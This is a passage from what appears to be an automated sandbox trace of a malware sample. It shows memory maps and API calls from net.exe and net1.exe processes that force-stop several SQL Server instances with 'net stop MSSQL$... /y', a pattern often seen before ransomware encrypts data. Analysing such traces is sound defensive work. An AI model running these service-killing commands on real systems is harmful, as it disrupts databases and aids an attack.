0x7fefe330000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 7571 start_va = 0x7feff2d0000 end_va = 0x7feff2d7fff entry_point = 0x7feff2d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 7572 start_va = 0x7feff490000 end_va = 0x7feff4dcfff entry_point = 0x7feff490000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 7573 start_va = 0x7feff740000 end_va = 0x7feff81afff entry_point = 0x7feff740000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 7574 start_va = 0x7feff820000 end_va = 0x7feff94cfff entry_point = 0x7feff820000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 7647 start_va = 0x75290000 end_va = 0x75291fff entry_point = 0x75290000 region_type = mapped_file name = "netmsg.dll" filename = "\\Windows\\System32\\netmsg.dll" (normalized: "c:\\windows\\system32\\netmsg.dll") Thread: id = 627 os_tid = 0x918 [0103.282] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x16fe30 | out: lpSystemTimeAsFileTime=0x16fe30*(dwLowDateTime=0xf2ba9270, dwHighDateTime=0x1d48689)) [0103.282] GetCurrentProcessId () returned 0xbf0 [0103.282] GetCurrentThreadId () returned 0x918 [0103.282] GetTickCount () returned 0x23957 [0103.282] QueryPerformanceCounter (in: lpPerformanceCount=0x16fe38 | out: lpPerformanceCount=0x16fe38*=1815020000000) returned 1 [0103.284] GetModuleHandleW (lpModuleName=0x0) returned 0xff970000 [0103.284] __set_app_type (_Type=0x1) [0103.284] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xff989c9c) returned 0x0 [0103.284] __getmainargs (in: _Argc=0xff994780, _Argv=0xff994790, _Env=0xff994788, _DoWildCard=0, _StartInfo=0xff99479c | out: _Argc=0xff994780, _Argv=0xff994790, _Env=0xff994788) returned 0 [0103.284] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0103.284] GetConsoleOutputCP () returned 0x1b5 [0103.336] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xff99cec0 | out: lpCPInfo=0xff99cec0) returned 1 [0103.337] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0103.339] sprintf_s (in: _DstBuf=0x16fdd8, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0103.339] setlocale (category=0, locale=".437") returned="English_United States.437" [0103.340] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0103.340] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0103.340] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop MSSQL$PRACTTICEBGC /y" [0103.340] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x16fb70, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe")) returned 0x1c [0103.341] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0103.341] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0x16fdc8 | out: Buffer=0x16fdc8*=0x364d60) returned 0x0 [0103.341] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0x16fdc8 | out: Buffer=0x16fdc8*=0x36c120) returned 0x0 [0103.341] _fileno (_File=0x7fefdba2a80) returned 0 [0103.341] _setmode (_FileHandle=0, _Mode=16384) returned 16384 [0103.341] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0103.341] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0103.341] _wcsicmp (_String1="config", _String2="stop") returned -16 [0103.341] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0103.341] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0103.341] _wcsicmp (_String1="file", _String2="stop") returned -13 [0103.341] _wcsicmp (_String1="files", _String2="stop") returned -13 [0103.341] _wcsicmp (_String1="group", _String2="stop") returned -12 [0103.341] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0103.341] _wcsicmp (_String1="help", _String2="stop") returned -11 [0103.341] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0103.341] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0103.341] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0103.341] _wcsicmp (_String1="session", _String2="stop") returned -15 [0103.341] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0103.341] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0103.341] _wcsicmp (_String1="share", _String2="stop") returned -12 [0103.341] _wcsicmp (_String1="start", _String2="stop") returned -14 [0103.342] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0103.342] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0103.342] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0103.342] _wcsicmp (_String1="accounts", _String2="MSSQL$PRACTTICEBGC") returned -12 [0103.342] _wcsicmp (_String1="computer", _String2="MSSQL$PRACTTICEBGC") returned -10 [0103.342] _wcsicmp (_String1="config", _String2="MSSQL$PRACTTICEBGC") returned -10 [0103.342] _wcsicmp (_String1="continue", _String2="MSSQL$PRACTTICEBGC") returned -10 [0103.342] _wcsicmp (_String1="cont", _String2="MSSQL$PRACTTICEBGC") returned -10 [0103.342] _wcsicmp (_String1="file", _String2="MSSQL$PRACTTICEBGC") returned -7 [0103.342] _wcsicmp (_String1="files", _String2="MSSQL$PRACTTICEBGC") returned -7 [0103.342] _wcsicmp (_String1="group", _String2="MSSQL$PRACTTICEBGC") returned -6 [0103.342] _wcsicmp (_String1="groups", _String2="MSSQL$PRACTTICEBGC") returned -6 [0103.342] _wcsicmp (_String1="help", _String2="MSSQL$PRACTTICEBGC") returned -5 [0103.342] _wcsicmp (_String1="helpmsg", _String2="MSSQL$PRACTTICEBGC") returned -5 [0103.342] _wcsicmp (_String1="localgroup", _String2="MSSQL$PRACTTICEBGC") returned -1 [0103.342] _wcsicmp (_String1="pause", _String2="MSSQL$PRACTTICEBGC") returned 3 [0103.342] _wcsicmp (_String1="session", _String2="MSSQL$PRACTTICEBGC") returned 6 [0103.342] _wcsicmp (_String1="sessions", _String2="MSSQL$PRACTTICEBGC") returned 6 [0103.342] _wcsicmp (_String1="sess", _String2="MSSQL$PRACTTICEBGC") returned 6 [0103.342] _wcsicmp (_String1="share", _String2="MSSQL$PRACTTICEBGC") returned 6 [0103.342] _wcsicmp (_String1="start", _String2="MSSQL$PRACTTICEBGC") returned 6 [0103.342] _wcsicmp (_String1="stats", _String2="MSSQL$PRACTTICEBGC") returned 6 [0103.342] _wcsicmp (_String1="statistics", _String2="MSSQL$PRACTTICEBGC") returned 6 [0103.342] _wcsicmp (_String1="stop", _String2="MSSQL$PRACTTICEBGC") returned 6 [0103.342] _wcsicmp (_String1="time", _String2="MSSQL$PRACTTICEBGC") returned 7 [0103.342] _wcsicmp (_String1="user", _String2="MSSQL$PRACTTICEBGC") returned 8 [0103.342] _wcsicmp (_String1="users", _String2="MSSQL$PRACTTICEBGC") returned 8 [0103.342] _wcsicmp (_String1="msg", _String2="MSSQL$PRACTTICEBGC") returned -12 [0103.342] _wcsicmp (_String1="messenger", _String2="MSSQL$PRACTTICEBGC") returned -14 [0103.342] _wcsicmp (_String1="receiver", _String2="MSSQL$PRACTTICEBGC") returned 5 [0103.342] _wcsicmp (_String1="rcv", _String2="MSSQL$PRACTTICEBGC") returned 5 [0103.342] _wcsicmp (_String1="netpopup", _String2="MSSQL$PRACTTICEBGC") returned 1 [0103.343] _wcsicmp (_String1="redirector", _String2="MSSQL$PRACTTICEBGC") returned 5 [0103.343] _wcsicmp (_String1="redir", _String2="MSSQL$PRACTTICEBGC") returned 5 [0103.343] _wcsicmp (_String1="rdr", _String2="MSSQL$PRACTTICEBGC") returned 5 [0103.343] _wcsicmp (_String1="workstation", _String2="MSSQL$PRACTTICEBGC") returned 10 [0103.343] _wcsicmp (_String1="work", _String2="MSSQL$PRACTTICEBGC") returned 10 [0103.343] _wcsicmp (_String1="wksta", _String2="MSSQL$PRACTTICEBGC") returned 10 [0103.343] _wcsicmp (_String1="prdr", _String2="MSSQL$PRACTTICEBGC") returned 3 [0103.343] _wcsicmp (_String1="devrdr", _String2="MSSQL$PRACTTICEBGC") returned -9 [0103.343] _wcsicmp (_String1="lanmanworkstation", _String2="MSSQL$PRACTTICEBGC") returned -1 [0103.343] _wcsicmp (_String1="server", _String2="MSSQL$PRACTTICEBGC") returned 6 [0103.343] _wcsicmp (_String1="svr", _String2="MSSQL$PRACTTICEBGC") returned 6 [0103.343] _wcsicmp (_String1="srv", _String2="MSSQL$PRACTTICEBGC") returned 6 [0103.343] _wcsicmp (_String1="lanmanserver", _String2="MSSQL$PRACTTICEBGC") returned -1 [0103.343] _wcsicmp (_String1="alerter", _String2="MSSQL$PRACTTICEBGC") returned -12 [0103.343] _wcsicmp (_String1="netlogon", _String2="MSSQL$PRACTTICEBGC") returned 1 [0103.343] _wcsupr (in: _String="MSSQL$PRACTTICEBGC" | out: _String="MSSQL$PRACTTICEBGC") returned="MSSQL$PRACTTICEBGC" [0103.343] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x36ce30 [0103.347] GetServiceKeyNameW (in: hSCManager=0x36ce30, lpDisplayName="MSSQL$PRACTTICEBGC", lpServiceName=0xff995750, lpcchBuffer=0x16fce8 | out: lpServiceName="", lpcchBuffer=0x16fce8) returned 0 [0103.348] _wcsicmp (_String1="msg", _String2="MSSQL$PRACTTICEBGC") returned -12 [0103.348] _wcsicmp (_String1="messenger", _String2="MSSQL$PRACTTICEBGC") returned -14 [0103.348] _wcsicmp (_String1="receiver", _String2="MSSQL$PRACTTICEBGC") returned 5 [0103.348] _wcsicmp (_String1="rcv", _String2="MSSQL$PRACTTICEBGC") returned 5 [0103.348] _wcsicmp (_String1="redirector", _String2="MSSQL$PRACTTICEBGC") returned 5 [0103.348] _wcsicmp (_String1="redir", _String2="MSSQL$PRACTTICEBGC") returned 5 [0103.348] _wcsicmp (_String1="rdr", _String2="MSSQL$PRACTTICEBGC") returned 5 [0103.348] _wcsicmp (_String1="workstation", _String2="MSSQL$PRACTTICEBGC") returned 10 [0103.348] _wcsicmp (_String1="work", _String2="MSSQL$PRACTTICEBGC") returned 10 [0103.348] _wcsicmp (_String1="wksta", _String2="MSSQL$PRACTTICEBGC") returned 10 [0103.348] _wcsicmp (_String1="prdr", _String2="MSSQL$PRACTTICEBGC") returned 3 [0103.348] _wcsicmp (_String1="devrdr", _String2="MSSQL$PRACTTICEBGC") returned -9 [0103.348] _wcsicmp (_String1="lanmanworkstation", _String2="MSSQL$PRACTTICEBGC") returned -1 [0103.348] _wcsicmp (_String1="server", _String2="MSSQL$PRACTTICEBGC") returned 6 [0103.348] _wcsicmp (_String1="svr", _String2="MSSQL$PRACTTICEBGC") returned 6 [0103.348] _wcsicmp (_String1="srv", _String2="MSSQL$PRACTTICEBGC") returned 6 [0103.348] _wcsicmp (_String1="lanmanserver", _String2="MSSQL$PRACTTICEBGC") returned -1 [0103.348] _wcsicmp (_String1="alerter", _String2="MSSQL$PRACTTICEBGC") returned -12 [0103.349] _wcsicmp (_String1="netlogon", _String2="MSSQL$PRACTTICEBGC") returned 1 [0103.349] NetServiceControl (in: servername=0x0, service="MSSQL$PRACTTICEBGC", opcode=0x0, arg=0x0, bufptr=0x16fcf0 | out: bufptr=0x16fcf0) returned 0x889 [0103.349] wcscpy_s (in: _Destination=0xff9980d0, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0103.349] LoadLibraryW (lpLibFileName="NETMSG") returned 0x75290000 [0103.350] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x75290000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0xff995b50, nSize=0x800, Arguments=0xff997f90 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0103.352] GetFileType (hFile=0xb) returned 0x2 [0103.352] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x16fbb8 | out: lpMode=0x16fbb8) returned 1 [0103.352] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff995b50*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0x16fbb0, lpReserved=0x0 | out: lpBuffer=0xff995b50*, lpNumberOfCharsWritten=0x16fbb0*=0x1e) returned 1 [0103.353] GetFileType (hFile=0xb) returned 0x2 [0103.353] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x16fbb8 | out: lpMode=0x16fbb8) returned 1 [0103.353] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff971efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x16fbb0, lpReserved=0x0 | out: lpBuffer=0xff971efc*, lpNumberOfCharsWritten=0x16fbb0*=0x2) returned 1 [0103.353] _ultow (in: _Dest=0x889, _Radix=1506336 | out: _Dest=0x889) returned="2185" [0103.353] FormatMessageW (in: dwFlags=0x2800, lpSource=0x75290000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0xff995b50, nSize=0x800, Arguments=0xff997f90 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0103.353] GetFileType (hFile=0xb) returned 0x2 [0103.354] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x16fbb8 | out: lpMode=0x16fbb8) returned 1 [0103.354] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff995b50*, nNumberOfCharsToWrite=0x34, lpNumberOfCharsWritten=0x16fbb0, lpReserved=0x0 | out: lpBuffer=0xff995b50*, lpNumberOfCharsWritten=0x16fbb0*=0x34) returned 1 [0103.354] GetFileType (hFile=0xb) returned 0x2 [0103.354] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x16fbb8 | out: lpMode=0x16fbb8) returned 1 [0103.355] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff971efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x16fbb0, lpReserved=0x0 | out: lpBuffer=0xff971efc*, lpNumberOfCharsWritten=0x16fbb0*=0x2) returned 1 [0103.355] NetApiBufferFree (Buffer=0x364d60) returned 0x0 [0103.355] NetApiBufferFree (Buffer=0x36c120) returned 0x0 [0103.355] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop MSSQL$PRACTTICEBGC /y" [0103.355] exit (_Code=2) Process: id = "185" image_name = "net.exe" filename = "c:\\windows\\system32\\net.exe" page_root = "0x57f66000" os_pid = "0x1200" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x954" cmd_line = "\"C:\\Windows\\System32\\net.exe\" stop MSSQL$SQL_2008 /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 7575 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 7576 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 7577 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 7578 start_va = 0x1b0000 end_va = 0x22ffff entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 7579 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 7580 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 7581 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 7582 start_va = 0xff5a0000 end_va = 0xff5bbfff entry_point = 0xff5a0000 region_type = mapped_file name = "net.exe" filename = "\\Windows\\System32\\net.exe" (normalized: "c:\\windows\\system32\\net.exe") Region: id = 7583 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 7584 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 7585 start_va = 0x7fffffd3000 end_va = 0x7fffffd3fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd3000" filename = "" Region: id = 7586 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 7587 start_va = 0x50000 end_va = 0x14ffff entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 7588 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 7589 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 7777 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 7778 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 7779 start_va = 0x230000 end_va = 0x296fff entry_point = 0x230000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 7780 start_va = 0x330000 end_va = 0x33ffff entry_point = 0x0 region_type = private name = "private_0x0000000000330000" filename = "" Region: id = 7781 start_va = 0x340000 end_va = 0x43ffff entry_point = 0x0 region_type = private name = "private_0x0000000000340000" filename = "" Region: id = 7782 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 7783 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 7784 start_va = 0x7fef46a0000 end_va = 0x7fef46b1fff entry_point = 0x7fef46a0000 region_type = mapped_file name = "browcli.dll" filename = "\\Windows\\System32\\browcli.dll" (normalized: "c:\\windows\\system32\\browcli.dll") Region: id = 7785 start_va = 0x7fefaaa0000 end_va = 0x7fefaab7fff entry_point = 0x7fefaaa0000 region_type = mapped_file name = "mpr.dll" filename = "\\Windows\\System32\\mpr.dll" (normalized: "c:\\windows\\system32\\mpr.dll") Region: id = 7786 start_va = 0x7fefaf50000 end_va = 0x7fefaf5afff entry_point = 0x7fefaf50000 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 7787 start_va = 0x7fefaf60000 end_va = 0x7fefaf86fff entry_point = 0x7fefaf60000 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 7788 start_va = 0x7fefb7c0000 end_va = 0x7fefb7d3fff entry_point = 0x7fefb7c0000 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 7789 start_va = 0x7fefb7e0000 end_va = 0x7fefb7f4fff entry_point = 0x7fefb7e0000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 7790 start_va = 0x7fefb800000 end_va = 0x7fefb80bfff entry_point = 0x7fefb800000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 7791 start_va = 0x7fefd3b0000 end_va = 0x7fefd3d2fff entry_point = 0x7fefd3b0000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 7792 start_va = 0x7fefdb10000 end_va = 0x7fefdbaefff entry_point = 0x7fefdb10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 7793 start_va = 0x7fefe330000 end_va = 0x7fefe34efff entry_point = 0x7fefe330000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 7794 start_va = 0x7feff2d0000 end_va = 0x7feff2d7fff entry_point = 0x7feff2d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 7795 start_va = 0x7feff740000 end_va = 0x7feff81afff entry_point = 0x7feff740000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 7796 start_va = 0x7feff820000 end_va = 0x7feff94cfff entry_point = 0x7feff820000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Thread: id = 628 os_tid = 0x1260 Process: id = "186" image_name = "net1.exe" filename = "c:\\windows\\system32\\net1.exe" page_root = "0x59817000" os_pid = "0x1340" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "176" os_parent_pid = "0x538" cmd_line = "C:\\Windows\\system32\\net1 stop MSSQL$PRACTICEMGT /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 7590 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 7591 start_va = 0x30000 end_va = 0xaffff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 7592 start_va = 0xb0000 end_va = 0xb3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000b0000" filename = "" Region: id = 7593 start_va = 0xc0000 end_va = 0xc0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 7594 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 7595 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 7596 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 7597 start_va = 0xff970000 end_va = 0xff9a2fff entry_point = 0xff970000 region_type = mapped_file name = "net1.exe" filename = "\\Windows\\System32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe") Region: id = 7598 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 7599 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 7600 start_va = 0x7fffffdb000 end_va = 0x7fffffdbfff entry_point = 0x0 region_type = private name = "private_0x000007fffffdb000" filename = "" Region: id = 7601 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 7602 start_va = 0x1d0000 end_va = 0x2cffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 7603 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 7604 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 7674 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 7675 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 7676 start_va = 0xd0000 end_va = 0x136fff entry_point = 0xd0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 7677 start_va = 0x160000 end_va = 0x16ffff entry_point = 0x0 region_type = private name = "private_0x0000000000160000" filename = "" Region: id = 7678 start_va = 0x2d0000 end_va = 0x3cffff entry_point = 0x0 region_type = private name = "private_0x00000000002d0000" filename = "" Region: id = 7679 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 7680 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 7681 start_va = 0x7fef7330000 end_va = 0x7fef7356fff entry_point = 0x7fef7330000 region_type = mapped_file name = "ntdsapi.dll" filename = "\\Windows\\System32\\ntdsapi.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll") Region: id = 7682 start_va = 0x7fefb050000 end_va = 0x7fefb05bfff entry_point = 0x7fefb050000 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll") Region: id = 7683 start_va = 0x7fefb6e0000 end_va = 0x7fefb6f1fff entry_point = 0x7fefb6e0000 region_type = mapped_file name = "browcli.dll" filename = "\\Windows\\System32\\browcli.dll" (normalized: "c:\\windows\\system32\\browcli.dll") Region: id = 7684 start_va = 0x7fefb7c0000 end_va = 0x7fefb7d3fff entry_point = 0x7fefb7c0000 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 7685 start_va = 0x7fefb7e0000 end_va = 0x7fefb7f4fff entry_point = 0x7fefb7e0000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 7686 start_va = 0x7fefb800000 end_va = 0x7fefb80bfff entry_point = 0x7fefb800000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 7687 start_va = 0x7fefb810000 end_va = 0x7fefb825fff entry_point = 0x7fefb810000 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 7688 start_va = 0x7fefc0a0000 end_va = 0x7fefc0bcfff entry_point = 0x7fefc0a0000 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll") Region: id = 7689 start_va = 0x7fefcca0000 end_va = 0x7fefcccffff entry_point = 0x7fefcca0000 region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\System32\\logoncli.dll" (normalized: "c:\\windows\\system32\\logoncli.dll") Region: id = 7690 start_va = 0x7fefd3b0000 end_va = 0x7fefd3d2fff entry_point = 0x7fefd3b0000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 7691 start_va = 0x7fefdb10000 